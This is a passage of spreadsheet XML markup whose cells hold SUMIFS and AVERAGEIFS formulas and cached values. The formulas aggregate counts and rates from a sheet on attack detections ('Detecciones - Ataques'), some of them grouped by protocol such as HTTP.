        <f>SUMIFS('(B) - Detecciones - Ataques'!DR$3:DR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK33,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!DR$3:DR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK33 &amp; "*")</f>
        <v>27</v>
      </c>
      <c r="FO33" s="304">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FH$3:FH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK33,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FH$3:FH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK33 &amp; "*")</f>
        <v>41</v>
      </c>
      <c r="FP33" s="284"/>
      <c r="FQ33" s="303" t="s">
        <v>1373</v>
      </c>
      <c r="FR33" s="69">
        <f t="shared" ref="FR33:FU33" si="14">1-(FL33/EJ35)</f>
        <v>0</v>
      </c>
      <c r="FS33" s="69">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="FT33" s="69">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="FU33" s="306">
        <f t="shared" si="14"/>
        <v>0.5393258427</v>
      </c>
      <c r="FV33" s="305"/>
      <c r="FW33" s="305"/>
      <c r="FX33" s="305"/>
      <c r="FY33" s="305"/>
      <c r="FZ33" s="305"/>
      <c r="GA33" s="305"/>
      <c r="GB33" s="305"/>
      <c r="GC33" s="305"/>
      <c r="GD33" s="305"/>
      <c r="GE33" s="305"/>
      <c r="GF33" s="305"/>
      <c r="GG33" s="405" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"HTTP")</f>
        <v>HTTP</v>
      </c>
      <c r="GH33" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG33)</f>
        <v>0.4640878512</v>
      </c>
      <c r="GI33" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG33)</f>
        <v>0.4639711515</v>
      </c>
      <c r="GJ33" s="373">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG33)</f>
        <v>0.4736842105</v>
      </c>
      <c r="GK33" s="405" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"HTTP")</f>
        <v>HTTP</v>
      </c>
      <c r="GL33" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG33)</f>
        <v>0.4610803324</v>
      </c>
      <c r="GM33" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG33)</f>
        <v>0.4609636327</v>
      </c>
      <c r="GN33" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG33)</f>
        <v>0.4736842105</v>
      </c>
      <c r="GO33" s="405" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"HTTP")</f>
        <v>HTTP</v>
      </c>
      <c r="GP33" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG33)</f>
        <v>0.4084487535</v>
      </c>
      <c r="GQ33" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG33)</f>
        <v>0.4083320537</v>
      </c>
      <c r="GR33" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG33)</f>
        <v>0.4210526316</v>
      </c>
      <c r="GS33" s="405" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"HTTP")</f>
        <v>HTTP</v>
      </c>
      <c r="GT33" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG33)</f>
        <v>0.002797783934</v>
      </c>
      <c r="GU33" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG33)</f>
        <v>0.002793115944</v>
      </c>
      <c r="GV33" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG33)</f>
        <v>0.1052631579</v>
      </c>
      <c r="GW33" s="305"/>
      <c r="GX33" s="305"/>
      <c r="GY33" s="305"/>
      <c r="GZ33" s="305"/>
      <c r="HA33" s="305"/>
      <c r="HB33" s="305"/>
      <c r="HC33" s="305"/>
      <c r="HD33" s="305"/>
      <c r="HE33" s="305"/>
      <c r="HF33" s="305"/>
      <c r="HG33" s="305"/>
      <c r="HH33" s="305"/>
      <c r="HI33" s="305"/>
      <c r="HJ33" s="305"/>
      <c r="HK33" s="305"/>
      <c r="HL33" s="305"/>
      <c r="HM33" s="305"/>
      <c r="HN33" s="305"/>
      <c r="HO33" s="305"/>
      <c r="HP33" s="305"/>
    </row>
    <row r="34">
      <c r="B34" s="277"/>
      <c r="C34" s="271"/>
      <c r="D34" s="271"/>
      <c r="E34" s="271"/>
      <c r="F34" s="271"/>
      <c r="G34" s="278"/>
      <c r="J34" s="277"/>
      <c r="K34" s="406">
        <f>K31- SUMIFS('(B) - Detecciones - Ataques'!M3:M139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-")</f>
        <v>15528</v>
      </c>
      <c r="L34" s="407">
        <f>L31- SUMIFS('(B) - Detecciones - Ataques'!N3:N139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-")</f>
        <v>12307</v>
      </c>
      <c r="M34" s="407">
        <f>M31- SUMIFS('(B) - Detecciones - Ataques'!P3:P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-")</f>
        <v>12534</v>
      </c>
      <c r="N34" s="408">
        <f>N31- SUMIFS('(B) - Detecciones - Ataques'!R3:R139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-")</f>
        <v>12553</v>
      </c>
      <c r="O34" s="278"/>
      <c r="Q34" s="271"/>
      <c r="R34" s="352" t="s">
        <v>2475</v>
      </c>
      <c r="S34" s="353">
        <f>S30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>2066</v>
      </c>
      <c r="T34" s="353">
        <f>T30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>0</v>
      </c>
      <c r="U34" s="353">
        <f>U30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>126</v>
      </c>
      <c r="V34" s="353">
        <f>V30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>19</v>
      </c>
      <c r="W34" s="353">
        <f>V30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>19</v>
      </c>
      <c r="X34" s="353">
        <f>X30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>7</v>
      </c>
      <c r="Y34" s="353">
        <f>Y30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>7</v>
      </c>
      <c r="Z34" s="353">
        <f>Z30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>8473</v>
      </c>
      <c r="AA34" s="353">
        <f>AA30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>347</v>
      </c>
      <c r="AB34" s="353">
        <f>AB30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>23</v>
      </c>
      <c r="AC34" s="353">
        <f>AC30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>10</v>
      </c>
      <c r="AD34" s="353">
        <f>AD30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>1005</v>
      </c>
      <c r="AE34" s="353">
        <f>AE30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>9</v>
      </c>
      <c r="AF34" s="354">
        <f>AF30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") + SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*",'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-") )</f>
        <v>462</v>
      </c>
      <c r="AG34" s="271"/>
      <c r="AH34" s="352" t="s">
        <v>2475</v>
      </c>
      <c r="AI34" s="355">
        <f>AI30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>2060</v>
      </c>
      <c r="AJ34" s="355">
        <f>AJ30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="AK34" s="355">
        <f>AK30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>4</v>
      </c>
      <c r="AL34" s="355">
        <f>AL30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="AM34" s="355">
        <f>AM30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="AN34" s="355">
        <f>AN30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="AO34" s="355">
        <f>AO30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="AP34" s="355">
        <f>AP30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="AQ34" s="355">
        <f>AQ30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>117</v>
      </c>
      <c r="AR34" s="355">
        <f>AR30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>4</v>
      </c>
      <c r="AS34" s="355">
        <f>AS30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="AT34" s="355">
        <f>AT30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="AU34" s="355">
        <f>AU30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>2</v>
      </c>
      <c r="AV34" s="355">
        <f>AV30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>2</v>
      </c>
      <c r="AW34" s="355">
        <f>AW30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="AX34" s="355">
        <f>AX30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>16</v>
      </c>
      <c r="AY34" s="355">
        <f>AY30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="AZ34" s="355">
        <f>AZ30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>2</v>
      </c>
      <c r="BA34" s="355">
        <f>BA30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="BB34" s="355">
        <f>BB30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="BC34" s="355">
        <f>BC30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>3</v>
      </c>
      <c r="BD34" s="355">
        <f>BD30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="BE34" s="355">
        <f>BE30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="BF34" s="355">
        <f>BF30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>2</v>
      </c>
      <c r="BG34" s="355">
        <f>BG30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="BH34" s="355">
        <f>BH30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="BI34" s="355">
        <f>BI30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="BJ34" s="355">
        <f>BJ30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="BK34" s="355">
        <f>BK30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>3</v>
      </c>
      <c r="BL34" s="355">
        <f>BL30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>1</v>
      </c>
      <c r="BM34" s="355">
        <f>BM30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>3292</v>
      </c>
      <c r="BN34" s="355">
        <f>BN30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>5180</v>
      </c>
      <c r="BO34" s="355">
        <f>BO30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="BP34" s="355">
        <f>BP30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="BQ34" s="355">
        <f>BQ30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>204</v>
      </c>
      <c r="BR34" s="355">
        <f>BR30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>0</v>
      </c>
      <c r="BS34" s="355">
        <f>BS30-( SUMIFS('(B) - Detecciones - Ataques'!$P3:$P139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27,'(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,"-"))</f>
        <v>2</v>
      </c>
      <c r="BT34" s="355">
